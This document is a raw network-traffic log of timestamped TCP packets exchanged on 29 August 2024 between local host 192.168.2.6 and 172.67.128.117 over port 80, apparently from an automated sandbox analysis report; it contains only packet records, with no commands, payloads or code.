                                    Aug 29, 2024 12:02:36.563347101 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.563349009 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.563359976 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.563364029 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.563371897 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.563384056 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.563385963 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.563395977 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.563409090 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.563416958 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.563420057 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.563431978 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.563452005 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.563513041 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.563513041 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.563623905 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.563636065 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.563647985 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.563659906 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.563671112 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.563683987 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.563694954 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.563738108 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.563754082 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.563831091 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.598345041 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.598375082 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.598387003 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.598398924 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.598411083 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.598423004 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.598436117 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.598448038 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.598464966 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.598526001 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.651288033 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.651335955 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.651349068 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.651355028 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.651352882 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.651365042 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.651376963 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.651386023 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.651391029 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.651401997 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.651441097 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.651457071 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.651468039 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.651478052 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.651489019 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.651493073 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.651503086 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.651520967 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.651526928 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.651546955 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.651573896 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.651597977 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.651602030 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.651612043 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.651613951 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.651624918 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.651638985 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.651659012 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.651747942 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.651758909 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.651770115 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.651781082 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.651782990 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.651793003 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.651819944 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.651844978 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.651851892 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.651863098 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.651899099 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.651899099 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.651983976 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.651994944 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.652007103 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.652014971 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.652018070 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.652029991 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.652034044 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.652043104 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.652050972 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.652055025 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.652079105 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.652095079 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.652168036 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.652179956 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.652192116 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.652201891 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.652204037 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.652224064 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.652252913 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.652285099 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.652297974 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.652307987 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.652318954 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.652323961 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.652335882 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.652362108 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.652412891 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.652425051 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.652436018 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.652445078 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.652472973 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.652475119 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.652496099 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.652507067 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.652507067 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.652518988 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.652530909 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.652534008 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.652544022 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.652560949 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.652576923 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.652698994 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.652712107 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.652721882 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.652733088 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.652735949 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.652745008 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.652751923 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.652779102 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.652968884 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.652981997 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.652993917 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.653004885 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.653006077 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.653017998 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.653029919 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.653032064 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.653043985 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.653055906 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.653060913 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.653067112 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.653079987 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.653084040 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.653091908 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.653100967 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.653103113 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.653115988 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.653120041 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.653127909 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.653136015 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.653163910 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.653331995 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.653343916 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.653367043 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.653392076 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.653498888 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.653512001 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.653522015 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.653532982 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.653534889 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.653547049 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.653549910 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.653558969 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.653567076 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.653569937 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.653589010 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.653595924 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.653599977 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.653611898 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.653614044 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.653625011 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.653636932 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.653637886 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.653650045 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.653661013 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.653666973 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.653671980 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.653681993 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.653688908 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.653708935 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.653733969 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.653923988 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.653944969 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.653956890 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.653971910 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.653975010 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.653987885 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.653990030 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.654000044 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.654012918 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.654017925 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.654026031 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.654035091 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.654037952 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.654050112 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.654059887 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.654062033 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.654073954 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.654087067 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.654088020 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.654104948 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.654122114 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.654340029 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.654352903 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.654365063 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.654377937 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.654383898 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.654390097 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.654396057 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.654402971 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.654413939 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.654433966 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.654448986 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.689201117 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.689222097 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.689234972 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.689259052 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.689286947 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.689291000 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.689302921 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.689315081 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.689328909 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.689342022 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.689362049 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.742005110 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.742078066 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.742090940 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.742110968 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.742121935 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.742132902 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.742139101 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.742155075 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.742192984 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.742218971 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.742233038 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.742244959 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.742254019 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.742254972 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.742269993 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.742288113 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.742315054 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.742325068 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.742336035 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.742346048 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.742357969 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.742358923 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.742373943 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.742377043 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.742403984 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.742407084 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.742460966 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.742472887 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.742487907 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.742501020 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.742510080 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.742523909 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.742541075 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.742583036 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.742597103 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.742609024 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.742620945 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.742620945 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.742634058 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.742640972 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.742672920 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.742727041 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.742737055 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.742748022 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.742758989 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.742760897 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.742779970 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.742805004 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.742918015 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.742930889 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.742943048 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.742954969 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.742955923 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.742966890 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.742973089 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.742980003 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.742993116 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.743001938 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.743016958 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.743041992 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.743053913 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.743087053 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.743196011 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.743210077 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.743223906 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.743238926 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.743241072 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.743252993 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.743257046 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.743263960 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.743266106 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.743278980 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.743283033 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.743294954 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.743307114 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.743309975 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.743319988 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.743330002 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.743356943 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.743393898 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.743405104 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.743417025 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.743427992 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.743455887 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.743510008 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.743520021 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.743531942 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.743545055 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.743555069 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.743587971 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.743644953 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.743663073 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.743674994 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.743680000 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.743686914 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.743700027 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.743710041 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.743710995 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.743722916 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.743736029 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.743740082 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.743747950 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.743757010 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.743772984 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.743798971 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.743937969 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.743951082 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.743963003 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.743974924 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.743987083 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.743998051 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.744012117 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.744024038 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.744025946 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.744034052 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.744055986 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.744075060 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.744210958 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.744224072 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.744235039 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.744249105 CEST8049717172.67.128.117192.168.2.6
